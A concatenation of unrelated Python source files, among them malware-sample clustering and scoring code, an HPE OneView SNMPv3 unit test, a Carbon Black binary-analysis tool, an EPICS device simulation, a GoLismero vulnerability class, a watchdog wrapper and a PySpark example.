Feature matrix from hashed n-grams
p_max : float
"Threshold for distances from data points to their nearest prototypes"
Returns
-------
(list, dict)
List of selected prototypes. Perhaps we want to keep using a subset of the sparse matrix though?
Mapping of prototypes to datapoints
"""
prototypes = list()
prototypes_to_data_points = dict()
# Randomly select first prototype
prototypes.append(random.randint(0, feature_matrix.get_shape()[0] - 1))
data_points = [data_point for data_point in range(feature_matrix.get_shape()[0]) if data_point != prototypes[0]]
prototypes_to_data_points[prototypes[0]] = data_points
# Find next prototype using the largest distance
prototype_distances = normalize(pairwise_distances(feature_matrix.getrow(prototypes[0]), feature_matrix),
norm="max")
next_potential_prototype = np.argmax(prototype_distances)
max_dist = np.max(prototype_distances)
# Find new prototypes until all data points are within radius Pmax of a prototype
while max_dist > p_max and len(prototypes) < feature_matrix.get_shape()[0]:
new_prototype = next_potential_prototype
new_prototype_distances = normalize(pairwise_distances(feature_matrix.getrow(new_prototype), feature_matrix),
norm="max")
prototype_distances = vstack((prototype_distances, new_prototype_distances))
new_prototype_data_points = list()
data_points_to_remove = list()
max_dist = 0
# For each datapoint, determine whether it needs to be shifted to the new prototype, while also
# keeping track of that max distance between data points and their closest prototypes to determine
# the next potential prototype
for prototype_index in range(len(prototypes)):
prototype = prototypes[prototype_index]
for data_point in prototypes_to_data_points[prototype]:
distance_to_current_prototype = prototype_distances[prototype_index][data_point]
distance_to_new_prototype = prototype_distances[-1][data_point]
# If data point is closer to new prototype, move it to new cluster
if distance_to_current_prototype > distance_to_new_prototype:
if new_prototype != data_point:
new_prototype_data_points.append(data_point)
data_points_to_remove.append(data_point)
distance_to_current_prototype = distance_to_new_prototype
# If a new max distance to a datapoint's closest prototype is found
# update the max distance and the next potential prototype
if distance_to_current_prototype > max_dist:
max_dist = distance_to_current_prototype
next_potential_prototype = data_point
# Remove data points from current cluster that are being moved to new cluster
prototypes_to_data_points[prototype] = [data_point for data_point in prototypes_to_data_points[prototype]
if data_point not in data_points_to_remove]
data_points_to_remove.clear()
# Create new prototype with corresponding cluster
prototypes.append(new_prototype)
prototypes_to_data_points[new_prototype] = new_prototype_data_points
return prototypes, prototypes_to_data_points
def cluster_prototypes(feature_matrix: csr_matrix, prototypes: list, min_d: float) -> list:
"""
Clusters prototypes together such that no two prototypes are within a certain threshold of one another
Parameters
----------
feature_matrix: sparse matrix of shape (n_samples, n_features)
Feature matrix from hashed n-grams
prototypes: list
List of prototype row indices in the feature matrix
min_d: float
Distance threshold for minimum distance between prototypes of a cluster
Returns
-------
list:
list of lists representing clusters
"""
# Sort prototypes for simpler computations
prototypes.sort()
# Initialize clusters as singleton clusters for each prototype
clusters = [[prototype] for prototype in prototypes]
# Compute distances between each of the prototypes
feature_matrix = feature_matrix[prototypes]
prototype_to_prototype_distances = normalize(pairwise_distances(feature_matrix, feature_matrix), norm="max")
# Assign all zero distances (prototypes' distances to themselves) from the distance matrix to 2
# where 2 is an arbitrary number > MinD
prototype_to_prototype_distances[prototype_to_prototype_distances == 0] = 2
# Compute minimum distance between two prototypes
min_dist = prototype_to_prototype_distances.min()
# Combine clusters until the minimum distance between closest clusters is >= MinD
while min_dist < min_d:
indices = np.where(prototype_to_prototype_distances == min_dist)
prototype1 = indices[0][0]
prototype2 = indices[1][0]
cluster_found = False
new_cluster = list()
# Combine prototype1 and prototype2 clusters together
for cluster in clusters:
if prototypes[prototype1] in cluster or prototypes[prototype2] in cluster:
if not cluster_found:
new_cluster = cluster
cluster_found = True
else:
for prototype in cluster:
new_cluster.append(prototype)
clusters.remove(cluster)
# Assign distance between prototype1 and prototype2 to 2 where 2 is an arbitrary number > MinD
prototype_to_prototype_distances[prototype1][prototype2] = 2
prototype_to_prototype_distances[prototype2][prototype1] = 2
# Compute the new minimum distance between clusters
min_dist = prototype_to_prototype_distances.min()
return clusters
def indices_to_md5s(prototype_clusters: list, prototypes_to_data_points: dict, md5s: list) -> tuple:
"""
Groups clusters together using their original md5s
Parameters
----------
prototype_clusters: list
List of lists representing clustered prototypes
prototypes_to_data_points: dict
Dict mapping from each prototype to the data points within their cluster
md5s: list
List of all md5s
Returns
-------
(List, List)
A list of lists where each inner list contains md5s representing a cluster
A list of lists where each inner lists contains md5s representing prototypes within a cluster
"""
md5_clusters = list()
current_cluster = list()
md5_prototype_clusters = list()
current_prototype_cluster = list()
# Convert clusters from indices to md5s
for cluster in prototype_clusters:
for prototype in cluster:
current_cluster.append(md5s[prototype])
current_prototype_cluster.append(md5s[prototype])
for data_point in prototypes_to_data_points[prototype]:
current_cluster.append(md5s[data_point])
md5_clusters.append(current_cluster.copy())
current_cluster.clear()
md5_prototype_clusters.append(current_prototype_cluster.copy())
current_prototype_cluster.clear()
return md5_clusters, md5_prototype_clusters
def score_clustering(md5_clusters: list, prototype_clusters: list, md5_to_avclass: dict):
"""
Scores clustering by various metrics (precision, recall, F-scores, homogeneity, completeness, V-Measure)
Parameters
----------
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
prototype_clusters: list
List of lists of md5s, where each inner list represents a cluster of prototypes
md5_to_avclass: dict
Mapping from md5s to AVClass labels attributed to each malware sample
Returns
-------
Tuple containing all scoring metrics
"""
y_true = list()
y_pred = list()
labels_accuracy = list()
# Assign cluster label for each cluster as most common AVClass labelling among prototypes in a cluster
for cluster_index in range(len(prototype_clusters)):
# Extract each AVClass label from this cluster
classes = [md5_to_avclass[md5] for md5 in prototype_clusters[cluster_index]]
# Assign the most common AVClass label as the cluster label
class_count = Counter(classes)
cluster_label = class_count.most_common(1)[0][0]
correct_classifications = 0
# Assign predicted and true AVClass labels to each sample
for md5 in md5_clusters[cluster_index]:
y_true.append(md5_to_avclass[md5])
y_pred.append(cluster_label)
if md5_to_avclass[md5] == cluster_label:
correct_classifications += 1
# Calculate how many samples in the cluster were accurately labeled
accuracy = round(correct_classifications / len(md5_clusters[cluster_index]), 4) * 100
labels_accuracy.append((cluster_label, accuracy))
# Score clustering
precision, recall, fscore_macro, _ = precision_recall_fscore_support(y_true=y_true, y_pred=y_pred, average='macro')
fscore_micro = f1_score(y_true=y_true, y_pred=y_pred, average='micro')
fscore_weighted = f1_score(y_true=y_true, y_pred=y_pred, average='weighted')
homogeneity, completeness, v_measure = homogeneity_completeness_v_measure(labels_true=y_true, labels_pred=y_pred)
return [precision, recall, fscore_macro, fscore_micro, fscore_weighted, homogeneity, completeness, v_measure], \
labels_accuracy
def cluster_signatures(int_to_ngram: dict, md5_clusters: list, md5_to_fvs: dict):
"""
Creates cluster signatures based on shared N-grams between elements in a cluster
Parameters
----------
int_to_ngram: dict
Integer encoding for each N-gram corresponding to index in feature vector
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
md5_to_fvs: dict
Mapping from md5s to feature vectors
Returns
-------
List
List of signatures (N-grams) corresponding to each cluster
"""
signatures = list()
features = list()
# Create signatures representing each cluster
for cluster in tqdm(md5_clusters, desc="CreatingSignatures"):
# Retrieve all the N-grams from this cluster (in the form of indices)
for md5 in cluster:
features.extend([index for index in range(len(md5_to_fvs[md5])) if md5_to_fvs[md5][index] > 0])
counter = Counter(features)
# Set the signature as the 7 most common N-grams in the cluster
# (or all N-grams if there are less than 7)
if len(counter) >= 7:
common_ngrams = counter.most_common(7)
signature = [int_to_ngram[ngram[0]] for ngram in common_ngrams]
else:
signature = [int_to_ngram[ngram[0]] for ngram in counter]
signatures.append(signature)
features.clear()
return signatures
def log_results(results: list, n: int, p_max: float, d_min: float, md5_clusters: list, md5_prototype_clusters: list,
md5_to_avclass: dict, signatures: list, labels_accuracy: list):
"""
Log results into a CSV file
Parameters
----------
results: list
List containing results to be logged
n: int
N-gram size
p_max: float
Distance threshold for prototype selection
d_min: float
Distance threshold for prototype clustering
md5_to_avclass: dict
Mapping from md5 to respective AVClass label
md5_clusters: list
List of lists of md5s, where each inner list represents a cluster
md5_prototype_clusters: list
List of lists of md5s, where each inner list represents a cluster of prototypes
signatures: list
List of signatures corresponding to each cluster
labels_accuracy: list
List of labels predicted for each cluster, along with % accuracy of that labeling
"""
date_time = datetime.now().strftime('%b-%d-%Y-%H-%M')
csv_file_name = "mutantxs_results_{}_{}_{}_{}.csv".format(n, p_max, d_min, date_time)
json_file_name = "mutantxs_results_{}_{}_{}_{}.json".format(n, p_max, d_min, date_time)
fields = ['precision', 'recall', 'fscore_macro', 'fscore_micro', 'fscore_weighted',
'homogeneity', 'completeness', 'v_measure']
# Log numerical results to a CSV file
with open(csv_file_name, 'w') as res_file:
csv_writer = csv.writer(res_file)
csv_writer.writerow(fields)
csv_writer.writerow(results)
clusters_info = list()
cluster_count = 0
# Log clustering results to JSON file
for cluster_index in range(len(md5_clusters)):
cluster = md5_clusters[cluster_index]
cluster_info = {
"cluster_number": cluster_count,
"sample_count": len(cluster),
"assigned_avclass": [
labels_accuracy[cluster_index][0],
labels_accuracy[cluster_index][1]
],
"md5s": [[md5, md5_to_avclass[md5]] for md5 in cluster],
"prototypes": [[md5, md5_to_avclass[md5]] for md5 in md5_prototype_clusters[cluster_index]],
"signature": [ngram for ngram in signatures[cluster_index]]
}
cluster_count += 1
clusters_info.append(cluster_info)
dict_results = {
"feature_set": "Ember",
"num_signatures": len(md5_clusters),
"compilation date": date_time,
"clusters": clusters_info
}
with open(json_file_name, 'w') as json_file:
dump(dict_results, json_file, indent=2)
if __name__ == '__main__':
lg.basicConfig(
format='[%(asctime)s %(filename)s:%(lineno)s - %(funcName)s()] %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=lg.INFO
)
main()
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2020] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import unittest
import mock
from hpeOneView.connection import connection
from hpeOneView.resources.settings.appliance_device_snmp_v3_users import ApplianceDeviceSNMPv3Users
from hpeOneView.resources.resource import ResourceClient
class ApplianceDeviceSNMPv3UsersTest(unittest.TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host, 800)
self._snmp_v3_users = ApplianceDeviceSNMPv3Users(self.connection)
@mock.patch.object(ResourceClient, 'get_all')
def test_get_all_called_once(self, mock_get):
self._snmp_v3_users.get_all()
mock_get.assert_called_once_with(0, -1, filter='', sort='')
@mock.patch.object(ResourceClient, 'create')
def test_create_called_once(self, mock_create):
resource = {
'type': 'Users',
'userName': 'testUser1',
'securityLevel': 'Authentication and privacy',
'authenticationProtocol': 'SHA512',
'authenticationPassphrase': 'authPass',
'privacyProtocol': 'AES-256',
'privacyPassphrase': '1234567812345678'
}
self._snmp_v3_users.create(resource)
mock_create.assert_called_once_with(resource, timeout=-1)
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._snmp_v3_users.get('0ca1b9e9-3c30-405f-b450-abd36730aa38')
mock_get.assert_called_once_with('0ca1b9e9-3c30-405f-b450-abd36730aa38')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_uri_called_once(self, mock_create):
uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.get_by('uri', uri)
mock_create.assert_called_once_with('uri', uri)
@mock.patch.object(ResourceClient, 'update')
def test_update_called_once(self, mock_create):
resource = {
'authenticationPassphrase': 'newAuthPass',
'privacyPassphrase': 8765432187654321,
'uri': '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
}
self._snmp_v3_users.update(resource)
mock_create.assert_called_once_with(resource, timeout=-1)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_called_once(self, mock_create):
id_or_uri = '/rest/appliance/snmpv3-trap-forwarding/users/0ca1b9e9-3c30-405f-b450-abd36730aa38'
self._snmp_v3_users.delete(id_or_uri)
mock_create.assert_called_once_with(id_or_uri, timeout=-1)
|
# -*- coding: utf-8 -*-
# *******************************************************
# Copyright (c) VMware, Inc. 2020-2021. All Rights Reserved.
# SPDX-License-Identifier: MIT
# *******************************************************
# *
# * DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
# * EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
# * WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
# * NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
Binary analysis tool for managing and submitting hashes
This class performs binary analysis on a series of hashes passed in on the command line.
"""
import os
import sys
import argparse
import logging
import traceback
from datetime import datetime
from cbc_binary_toolkit import cli_input
from cbc_binary_toolkit import EngineResults
from cbc_binary_toolkit.config import Config
from cbc_binary_toolkit.deduplication_component import DeduplicationComponent
from cbc_binary_toolkit.ingestion_component import IngestionComponent
from cbc_binary_toolkit.engine import LocalEngineManager
from cbc_binary_toolkit.state import StateManager
from cbc_sdk import CBCloudAPI
DEFAULT_LOG_LEVEL = "INFO"
LOG_LEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG
}
log = logging.getLogger(__name__)
class AnalysisUtility:
"""The top level analysis utility class. This is intended as an example which can be modified as needed."""
def __init__(self, default_install):
"""Constructor for the analysis utility class"""
self.default_install = default_install
self.config = None
self.cbc_api = None
# Create argument parser
self._parser = argparse.ArgumentParser()
self._parser.add_argument("-c", "--config", type=str, default=default_install,
help="Location of the configuration file (default {0})".format(default_install))
self._parser.add_argument("-ll", "--log-level", type=str, default="INFO",
choices=["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
help="The base log level (default {0})".format(DEFAULT_LOG_LEVEL))
commands = self._parser.add_subparsers(help="Binary analysis commands", dest="command_name")
# Analyze command parser
analyze_command = commands.add_parser("analyze", help="Analyze a list of hashes by command line or file")
input_type = analyze_command.add_mutually_exclusive_group(required=True)
input_type.add_argument("-l", "--list", type=str, help="List of hashes in JSON string format")
input_type.add_argument("-f", "--file", type=argparse.FileType('r'),
help="File of hashes in json or csv format")
# Restart command parser
commands.add_parser("restart", help="Restart a failed job and pick up where the job crashed or exited")
# Clear command parser
clear_command = commands.add_parser("clear", help="Clear cache of analyzed hashes. All or by timestamp")
clear_command.add_argument("-t", "--timestamp", type=str,
help="ISO 8601 date format {YYYY-MM-DD HH:MM:SS.SSS}")
clear_command.add_argument("--force", action='store_true', help="Force clearing without prompting")
clear_command.add_argument("-r", "--reports", action='store_true', help="Also clear any unsent reports present")
def _init_components(self):
"""
Initialize the components of the toolkit, injecting their dependencies as they're created.
Returns:
dict: A dict containing all the references to the top-level components.
"""
try:
state_manager = StateManager(self.config)
except:
log.error("Failed to create State Manager. Check your configuration")
log.debug(traceback.format_exc())
state_manager = None
cbc_api = self.cbc_api
if cbc_api is None:
cbc_api = CBCloudAPI(url=self.config.get("carbonblackcloud.url"),
org_key=self.config.get("carbonblackcloud.org_key"),
token=self.config.get("carbonblackcloud.api_token"),
ssl_verify=self.config.get("carbonblackcloud.ssl_verify"))
deduplicate = DeduplicationComponent(self.config, state_manager)
ingest = IngestionComponent(self.config, cbc_api, state_manager)
results_engine = EngineResults(self.config.get("engine.name"), state_manager, cbc_api)
if self.config.get("engine.type") == "local":
try:
engine_manager = LocalEngineManager(self.config)
except:
log.error("Failed to create Local Engine Manager. Check your configuration")
log.debug(traceback.format_exc())
engine_manager = None
else:
engine_manager = None
return {
"deduplicate": deduplicate,
"ingest": ingest,
"engine_manager": engine_manager,
"results_engine": results_engine,
"state_manager": state_manager,
"success": True if state_manager is not None and engine_manager is not None else False
}
def _yes_or_no(self, question):
"""
Request confirmation of something from the user.
Args:
question (str): Question to ask the user.
Returns:
boolean: True if the user answered Yes, False if they answered No.
"""
reply = str(input(f"{question}: (y/n)")).lower().strip()
if reply[0] == 'y':
return True
if reply[0] == 'n':
return False
else:
log.error("Invalid: please use y/n")
return self._yes_or_no(question)
def _any_reports_present(self, state_manager):
"""
Returns True if there are any report items present in the database.
Args:
state_manager (StateManager): The state manager object created by the clear process.
Returns:
(boolean) True if there are any report items present in the database, False if not.
"""
for i in range(1, 11):
items = state_manager.get_current_report_items(i, self.config.get("engine.name"))
if len(items) > 0:
return True
return False
def _process_metadata(self, components, metadata_list):
"""
Analyze a list of metadata through the analysis engine and report on the results.
The back end to the analyze and restart commands.
Args:
components (dict): Dict containing all the component references as returned from _init_components.
metadata_list (list): List of metadata objects to be analyzed.
"""
for metadata in metadata_list:
response = components["engine_manager"].analyze(metadata)
components["results_engine"].receive_response(response)
log.info('Analysis Completed')
if self.config.get("engine.feed_id"):
components["results_engine"].send_reports(self.config.get("engine.feed_id"))
else:
log.info("Feed publishing disabled. Specify a feed_id to enable")
def _analyze_command(self, args, components):
"""
Implements the "analyze" command to analyze a list of hashes.
Args:
args (Namespace): The command-line arguments as parsed.
components (dict): Dict containing all the component references as returned from _init_components.
"""
if args.file is not None:
hash_group = cli_input.read_csv(args.file)
else:
hash_group = cli_input.read_json(args.list)
before = len(hash_group)
log.info("Checking for previously executed binaries")
hash_group = components["deduplicate"].deduplicate(hash_group)
if before > len(hash_group):
log.info(f"Found {before - len(hash_group)} binaries that have already been analyzed")
metadata_list = components["ingest"].fetch_metadata(hash_group)
self._process_metadata(components, metadata_list)
def _restart_command(self, components):
"""
Implements the "restart" command to resume analysis on already-ingested hash values.
Args:
components (dict): Dict containing all the component references as returned from _init_components.
"""
components["results_engine"].reload()
metadata_list = components["ingest"].reload()
self._process_metadata(components, metadata_list)
def main(self, cmdline_args):
"""
Entry point for the analysis utility.
Args:
cmdline_args (list): Command-line argument strings to be parsed.
Returns:
int: Return code from the utility (0=success, nonzero=failure).
"""
args = self._parser.parse_args(cmdline_args)
logging.basicConfig(level=LOG_LEVELS[args.log_level])
if args.log_level != "DEBUG":
sys.tracebacklimit = 0
log.debug("Started: {}".format(datetime.now()))
if args.command_name is None:
print(
"usage: cbc-binary-analysis [-h] [-c CONFIG]\n"
" [-ll {DEBUG,INFO,WARNING,ERROR,CRITICAL}]\n"
" {analyze,restart,clear} ...\n"
"cbc-binary-analysis: error: the following arguments are required: command_name")
return
try:
if self.config is None:
if args.config != self.default_install:
self.config = Config.load_file(args.config)
elif self.default_install == "ERROR":
# Exit if default_install was not found
log.error("Exiting as default example config file could not be "
"found and no alternative was specified")
return 1
else:
log.info(f"Attempting to load config from {self.default_install}")
self.config = Config.load_file(self.default_install)
if args.command_name == "analyze":
components = self._init_components()
if components["success"]:
log.info("Analyzing hashes")
self._analyze_command(args, components)
elif args.command_name == "clear":
timestamp = args.timestamp
if timestamp is None:
timestamp = str(datetime.now())
if not (args.force or self._yes_or_no(f"Confirm you want to clear runs prior to {timestamp}")):
log.info("Clear canceled")
return
# Clear previous states
try:
state_manager = StateManager(self.config)
except:
log.error("Failed to create State Manager. Check your configuration")
log.debug(traceback.format_exc())
else:
log.info("Clearing cache")
state_manager.prune(timestamp)
if args.reports and self._any_reports_present(state_manager):
if args.force or self._yes_or_no("Confirm you want to clear unsent report items"):
log.info("Clearing report items")
for i in range(1, 11):
state_manager.clear_report_items(i, self.config.get("engine.name"))
elif args.command_name == "restart":
components = self._init_components()
if components["success"]:
log.info("Restarting")
self._restart_command(components)
log.debug("Finished: {}".format(datetime.now()))
return 0
except Exception:
log.error(traceback.format_exc())
return 1
def main():
"""Universal Entry Point"""
if "cbc-binary-toolkit" in os.path.dirname(os.path.realpath(__file__)):
default_install = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"../../../config/binary-analysis-config.yaml.example")
else:
starting_dir = (os.path.dirname(os.path.realpath(__file__)), "")
config_example_dir = "carbonblackcloud/binary-toolkit/binary-analysis-config.yaml.example"
# Try and navigate up and find example config file
while starting_dir[0] != "" and starting_dir[0] != "/":
if os.path.exists(os.path.join(starting_dir[0], config_example_dir)):
break
starting_dir = os.path.split(starting_dir[0])
if starting_dir[0] == "" or starting_dir[0] == "/":
default_install = "ERROR"
else:
default_install = os.path.join(starting_dir[0], config_example_dir)
AnalysisUtility(default_install).main(sys.argv[1:])
if __name__ == '__main__':
sys.exit(main())
|
from lewis.devices import Device
from lewis.adapters.epics import EpicsInterface, PV
from lewis.adapters.stream import StreamInterface, Var
from lewis.core.utils import check_limits
class VerySimpleDevice(Device):
upper_limit = 100
lower_limit = 0
simple = 42
ropi = 3.141
param = 10
_second = 2.0
def get_param(self):
"""The parameter multiplied by 2."""
return self.param * 2
def set_param(self, new_param):
self.param = int(new_param / 2)
@property
def second(self):
"""A second (floating point) parameter."""
return self._second
@second.setter
@check_limits('lower_limit', 'upper_limit')
def second(self, new_second):
self._second = new_second
class VerySimpleInterface(EpicsInterface):
"""
This is the EPICS interface to a quite simple device. It offers 5 PVs that expose
different things that are part of the device, the interface or neither.
"""
pvs = {
'Simple': PV('simple', type='int', doc='Just an attribute exposed as on a PV'),
'PI': PV('ropi', type='float', read_only=True, doc='Example of a read-only attribute'),
'Param': PV(('get_param', 'set_param'), type='int', doc='Exposed via getter/setter'),
'Second': PV('second', meta_data_property='param_raw_meta', doc='Meta-property to add limits'),
'Second-Int': PV('second_int', type='int', doc='Conversion to int via helper function'),
'Constant': PV(lambda: 4, doc='A constant number, returned from lambda function.')
}
@property
def param_raw_meta(self):
return {'lolo': self.device.lower_limit, 'hihi': self.device.upper_limit}
@property
def second_int(self):
"""The second parameter as an integer."""
return int(self.device.second)
class VerySimpleStreamInterface(StreamInterface):
"""This is a TCP stream interface to the epics device, which only exposes param."""
commands = {
Var('param', read_pattern=r'P\?$', write_pattern=r'P=(\d+)', argument_mappings=(int,),
doc='An integer parameter.')
}
in_terminator = '\r\n'
out_terminator = '\r\n'
# Really don't like this
framework_version = '1.2.1'
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2021, OMRON SINIC X
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of OMRON SINIC X nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Felix von Drigalski
import sys
import rospy
import unittest
from o2ac_routines.helpers import *
from o2ac_routines.assembly import O2ACAssembly
class TestAssembly(unittest.TestCase):
def setUp(self):
"""
Sets up the test. Afterwards, all functions starting with test_ are executed.
"""
self.base = O2ACAssembly()
def test_full_assembly_task(self):
# Prepare scene
self.base.reset_scene_and_robots()
self.base.spawn_objects_for_demo(base_plate_in_tray=True, layout_number=2)
# Execute
success = self.base.full_assembly_task()
print("Full assembly test finished")
self.assertTrue(success)
if __name__ == '__main__':
import rostest
rospy.init_node('test_robot_motions')
rostest.rosrun('o2ac_routines', 'test_robot_motions', TestAssembly)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__license__= """
GoLismero 2.0 - The web knife - Copyright (C) 2011-2014
Golismero project site: https://github.com/golismero
Golismero project mail: contact@golismero-project.com
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = ["SuspiciousHTML"]
from .. import Vulnerability
from ... import identity
from ...information.html import HTML
#------------------------------------------------------------------------------
class SuspiciousHTML(Vulnerability):
"""
Suspicious HTML Content.
HTML content was found that may contain sensitive information.
User attention could be required.
"""
TARGET_CLASS = HTML
DEFAULTS = Vulnerability.DEFAULTS.copy()
DEFAULTS["level"] = "informational"
DEFAULTS["cvss_base"] = "2.9"
DEFAULTS["references"] = (
"https://www.owasp.org/index.php/Information_Leakage",
)
#--------------------------------------------------------------------------
def __init__(self, target, substring, **kwargs):
"""
:param target: HTML content where the suspicious substring was found.
:type target: HTML
:param substring: Substring that causes suspicion.
:type substring: str
"""
# Validate the data types.
if type(substring) is not str:
raise TypeError("Expected str, got %r instead" % type(substring))
# Save the properties.
self.__substring = substring
# Parent constructor.
super(SuspiciousHTML, self).__init__(target, **kwargs)
__init__.__doc__ += Vulnerability.__init__.__doc__[
Vulnerability.__init__.__doc__.find("\n :keyword"):]
#--------------------------------------------------------------------------
@identity
def substring(self):
"""
:returns: Substring that causes suspicion.
:rtype: str
"""
return self.__substring
|
#!/usr/bin/python3
# WDT: Watchdog Timer
# A python 3 interface to use the linux watchdog timer
#
# (c) Marco Tedaldi <tedaldi@hifo.uzh.ch> 2014
# License: MIT, http://opensource.org/licenses/MIT
import time # for the delay inside main
import sys # needed for exit
import os # needed for file handling
# Watchdog timer class
# First, check if the watchdog file exists and is writeable
class wdt:
def __init__(self, watchdogfile="/dev/watchdog" ):
self.ok = os.path.exists(watchdogfile)
self.watchdog = watchdogfile
if self.ok:
self.ok = os.access(watchdogfile, os.W_OK)
return
# Open the watchdog file for writing.
# ATTENTION, this already activates the watchdog! If you do not
# trigger the watchdog within 15 sekonds, the system will reset!
def open(self):
if self.ok:
try:
self.wdthandle = open(self.watchdog, "w")
except:
self.ok = False
return self.ok
# Deactivate the watchdog timer by sending the magic character
def deactivate(self):
try:
self.wdthandle.write("V")
self.wdthandle.flush()
except:
self.ok = False
return self.ok
# refresh the watchdog
def refresh(self):
try:
self.wdthandle.write(" ")
self.wdthandle.flush()
self.ok = True
except:
self.ok = False
return self.ok
# close (Don't forget the deactivate, before closing!
def finish(self):
try:
self.wdthandle.close()
self.ok = True
except:
self.ok = False
return self.ok
def status(self):
return self.ok
# Main function. Here, mainly as test
def main():
wd = wdt() # Create watchdog object
print(wd.status()) # print the status
wd.open() # Open the watchdog file
print(wd.status()) # print the status (if watchdog could be activated)
while True:
try:
wd.refresh() # Retrigger the watchdog
print("Watchdog kicked") # Talk about what you did!
print(wd.status())
time.sleep(1.0) # Wait for one second befor kicking the watchdog again
except KeyboardInterrupt: # If the user presses ctrl+c
print("ctrl+c pressed, will terminate")
wd.deactivate() # Deactivate the watchdog so the system is not rebooted
wd.finish() # release the file handle
sys.exit() # exit
# Only run main, if this program is called directly (not imported by another program)
if __name__ == "__main__":
main();
|
#! encoding=utf8
# ======================================================================================================================================
# Serialization is used for performance tuning on Apache Spark. All data that is sent over the network or written to the disk or persisted
# in the memory should be serialized. Serialization plays an important role in costly operations.
# PySpark supports custom serializers for performance tuning. The following two serializers are supported by PySpark −
# MarshalSerializer
# Serializes objects using Python’s Marshal Serializer. This serializer is faster than PickleSerializer, but supports fewer datatypes.
# PickleSerializer
# Serializes objects using Python’s Pickle Serializer. This serializer supports nearly any Python object, but may not be as fast as
# more specialized serializers.
# ======================================================================================================================================
from pyspark.context import SparkContext
from pyspark.serializers import MarshalSerializer
sc = SparkContext("local", "serialization app", serializer = MarshalSerializer())
print(sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10))
sc.stop()
|
import csv
from itertools import product
import os
import random
import time
import numpy as np
import mxnet as mx
import tensorflow as tf
import torch as pt
from common import render_exception
def set_seed(seed):
# cover our bases: different frameworks and libraries
# need to have their seeds set
np.random.seed(seed)
mx.random.seed(seed)
tf.set_random_seed(seed)
pt.manual_seed(seed)
random.seed(seed)
def configure_seed(config):
"""
Convenience for experiment scripts: Takes an experiment config
and sets the seed if specified.
Assumes that the config has a boolean field called 'set_seed'
and an integer field called 'seed' for determining whether to
set the seed and the value to use.
"""
if config['set_seed']:
set_seed(config['seed'])
def _write_row(writer, fieldnames, fields):
record = {}
for i in range(len(fieldnames)):
record[fieldnames[i]] = fields[i]
writer.writerow(record)
def _score_loop(num, trial, trial_args, setup_args, n_times, dry_run, writer, fieldnames):
for i in range(dry_run + n_times):
if i == dry_run:
tic = time.time()
